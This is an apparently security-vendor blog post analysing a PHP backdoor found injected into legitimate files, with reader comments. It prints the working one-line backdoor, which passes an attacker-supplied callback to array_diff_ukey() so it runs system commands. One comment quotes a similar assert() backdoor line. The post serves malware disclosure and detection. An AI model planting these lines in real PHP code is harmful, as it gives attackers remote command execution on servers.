PHP Callback Functions: Another Way to Hide Backdoors

We often find new techniques employed by malware authors. Some are very interesting, others are pretty funny, and then there are those that really stump us in their creativity and effectiveness. This post is about the latter.

Everyone who writes code in PHP knows what the eval() function is for. It evaluates a string as PHP code. In other words, it executes the code. But there are certainly many other ways to run code, some of which are not always so obvious. The most popular and commonly used one is the preg_replace() function.

According to its description, the preg_replace functions “performs a regular expression search and replace.” Unfortunately, when using the “e” modifier, this function also runs the code. Yes, there are more ways of running the code without using the eval() function. Example could be the create_function(), or the assert() function. All these options for running code makes malware analysis a more complex a process.

That being said, even with our insights we continue to find ingenious ways that malware authors are employing for their backdoors.

The Backdoor

It started with following line of code injected at the top of a legitimate PHP file:

@array_diff_ukey(@array((string)$_REQUEST['password']=>1), @array((string)stripslashes($_REQUEST['re_password'])=>2),$_REQUEST['login']);

It took me a little while to understand how this could work (and thanks to Ante Kresic for helping me here), but in the end, I realized that the problem is in the callback functions. Can you see why?

The malware author set the callback function to be the variable “login” and it is controlled by the attacker. So he can set login to be the system or exec functions, allowing him to execute commands on the server.

Take a look at this example:


Yes, the attacker just ran the “system” command using this technique. The malware authors can execute any other commands they want on the server with that 1 line of code. To make matters worse, that little payload was not detected by any anti-virus or security software that we tested.

What’s the Big Deal?

Most security tools and articles online recommend webmasters look for a certain subset of functions that are often used for malicious purposes. Like eval, preg_replace, base64_decode and a few other combinations. Well, guess what, attackers know that too and look at what they are starting to employ, good functions for bad purposes.

Also, note that they are not just restricted to the array_diff_ukey() function, but any other function that allows for callbacks.

There goes the neighborhood…

About Peter Gramantik

Peter has been working in Information Security over 10 years. He previously worked as a Virus Analysis Specialist for AVG and now holds the Sucuri flag as a Senior Malware Researcher. When he’s not on the clock, you can find him singing and playing guitar or ukulele in one of his bands, fishing, riding his Harley Davidson Sportster, or researching malware on his own. Follow him on Twitter at @petergramantik

  • The XC3LL

    That was found in a real malware? In March I published this way to hide backdoors in my blog but just as theory. Is pretty funny see how malware in PHP is so easy to hide

  • David Watkinson

    Shouldn’t it be “all your data ARE belong to me”? lol
    On a more serious note, I would doubt that anti-virus would detect that, but security systems should have detected it or at worst flagged it. Maybe security systems should be looking for access methods within code also.

  • mathews

    eval() code is used for evaluating PHP code used in a program. Thanks for sharing such informative blog.

    PHP Training Chennai

  • Chilion Snoek

    Sir! How can we check for those damn functions? :(

  • Anandajoti

    Thanks Peter, we finally found the backdoor thank to this.

  • unkulunkulu

    Hahaha, just got an email with a suggestion to put
    assert(stripslashes($_REQUEST[roskomnadzor])) at a spacific address. Thanks.

Share This